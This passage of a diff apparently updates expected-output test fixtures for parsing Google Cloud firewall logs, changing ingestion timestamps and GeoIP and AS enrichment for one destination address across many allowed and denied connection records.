ork_name\":\"mysubnet\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"892378332\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", @@ -216,8 +216,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "address": "67.43.156.13", "port": 53, @@ -293,7 +301,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705405800Z", + "ingested": "2021-12-14T14:43:24.666224234Z", "original": "{\"insertId\":\"4zuj4nfn4llkb\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53,\"protocol\":17,\"src_ip\":\"10.128.0.16\",\"src_port\":60094},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:35:24.466374097Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:35:17.214711274Z\"}", "kind": "event", "action": "firewall-rule", @@ -388,7 +396,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705412100Z", + "ingested": "2021-12-14T14:43:24.666224663Z", "original": "{\"insertId\":\"1f21ciqfpfssuo\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.168.2.126\",\"src_port\":64853},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"Asia\",\"country\":\"omn\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-10-30T13:52:54.473174731Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-10-30T13:52:42.191988835Z\"}", "kind": "event", "action": "firewall-rule", @@ -486,7 +494,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705417200Z", + "ingested": "2021-12-14T14:43:24.666225085Z", "original": "{\"insertId\":\"8vcfeailjd\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.219\",\"src_port\":2897},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Krasnodar\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Krasnodar Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:31:22.738796433Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:31:19.421478847Z\"}", "kind": "event", "action": "firewall-rule", @@ -582,7 +590,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705423Z", + "ingested": "2021-12-14T14:43:24.666225507Z", "original": "{\"insertId\":\"1bqgmw9feiabij\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:35.727004321Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:31.079508196Z\"}", "kind": "event", "action": "firewall-rule", @@ -678,7 +686,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705428700Z", + "ingested": "2021-12-14T14:43:24.666225899Z", "original": "{\"insertId\":\"1jrxaqbfe48bir\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:40.791816098Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:34.190831607Z\"}", "kind": "event", "action": "firewall-rule", @@ -776,7 +784,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705434Z", + "ingested": "2021-12-14T14:43:24.666226307Z", "original": "{\"insertId\":\"1fw7drlfe2ty27\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.151\",\"src_port\":62551},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Berdychiv\",\"continent\":\"Europe\",\"country\":\"ukr\",\"region\":\"Zhytomyr Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:48:47.038820509Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:48:41.449552758Z\"}", "kind": "event", "action": "firewall-rule", @@ -874,7 +882,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705438700Z", + "ingested": "2021-12-14T14:43:24.666226693Z", "original": "{\"insertId\":\"1yre751fekaxzs\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.241\",\"src_port\":44542},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Vicenza\",\"continent\":\"Europe\",\"country\":\"ita\",\"region\":\"Veneto\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:10:30.804549999Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:10:24.214995318Z\"}", "kind": "event", "action": "firewall-rule", @@ -972,7 +980,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705444400Z", + "ingested": "2021-12-14T14:43:24.666227094Z", "original": "{\"insertId\":\"5kanfzfiqepkh\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":41293},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Tula\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Tula Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:35:28.934918322Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:35:23.504719962Z\"}", "kind": "event", "action": "firewall-rule", @@ -1070,7 +1078,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705448500Z", + "ingested": "2021-12-14T14:43:24.666227493Z", "original": "{\"insertId\":\"59z0t8fiow9vg\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.251\",\"src_port\":59106},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Stavropol\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Stavropol Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:36:54.238077643Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:36:52.135887769Z\"}", "kind": "event", "action": "firewall-rule", @@ -1168,7 +1176,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705453300Z", + "ingested": "2021-12-14T14:43:24.666228300Z", "original": "{\"insertId\":\"1y7e4yzff816cq\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:26.357446279Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:16.59353182Z\"}", "kind": "event", "action": "firewall-rule", @@ -1266,7 +1274,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705459100Z", + "ingested": "2021-12-14T14:43:24.666228695Z", "original": "{\"insertId\":\"lx5jlsfggpr0q\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:28.203068653Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:22.930570324Z\"}", "kind": "event", "action": "firewall-rule", @@ -1364,7 +1372,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705567900Z", + "ingested": "2021-12-14T14:43:24.666229090Z", "original": "{\"insertId\":\"18ynfbufer19m1\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.200\",\"src_port\":42716},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"İzmir\",\"continent\":\"Asia\",\"country\":\"tur\",\"region\":\"İzmir\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:32:14.038485761Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:32:07.407039908Z\"}", "kind": "event", "action": "firewall-rule", @@ -1379,8 +1387,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "address": "67.43.156.13", "port": 80, @@ -1456,7 +1472,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705590600Z", + "ingested": "2021-12-14T14:43:24.666229470Z", "original": "{\"insertId\":\"tzddthfsr6fv5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.28.0.16\",\"src_port\":46418},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:41:28.971534988Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:41:20.972747063Z\"}", "kind": "event", "action": "firewall-rule", @@ -1471,8 +1487,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "address": "67.43.156.13", "port": 80, @@ -1548,7 +1572,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705596600Z", + "ingested": "2021-12-14T14:43:24.666229864Z", "original": "{\"insertId\":\"1k2b7kefsnhzq7\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":80,\"protocol\":17,\"src_ip\":\"10.28.0.16\",\"src_port\":58725},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:42:33.671883883Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:42:26.50532921Z\"}", "kind": "event", "action": "firewall-rule", @@ -1656,7 +1680,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705601100Z", + "ingested": "2021-12-14T14:43:24.666230420Z", "original": "{\"insertId\":\"1sdfuwxfk8hq1c\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":44666},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.531819246Z\"}", "kind": "event", "action": "firewall-rule", @@ -1764,7 +1788,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705605700Z", + "ingested": "2021-12-14T14:43:24.666230812Z", "original": "{\"insertId\":\"1sdfuwxfk8hq1b\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":44668},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.551617516Z\"}", "kind": "event", "action": "firewall-rule", @@ -1861,7 +1885,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705611400Z", + "ingested": "2021-12-14T14:43:24.666231201Z", "original": "{\"insertId\":\"yot1ojetjdiw\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.168.2.7\",\"src_port\":1683},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"city\":\"Almelo\",\"continent\":\"Europe\",\"country\":\"nld\",\"region\":\"Overijssel\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:28.477733837Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:15.771161946Z\"}", "kind": "event", "action": "firewall-rule", @@ -1969,7 +1993,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705617Z", + "ingested": "2021-12-14T14:43:24.666231588Z", "original": "{\"insertId\":\"5a27u1g22jks9e\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":45068},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.850729583Z\"}", "kind": "event", "action": "firewall-rule", @@ -2077,7 +2101,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705622700Z", + "ingested": "2021-12-14T14:43:24.666231995Z", "original": 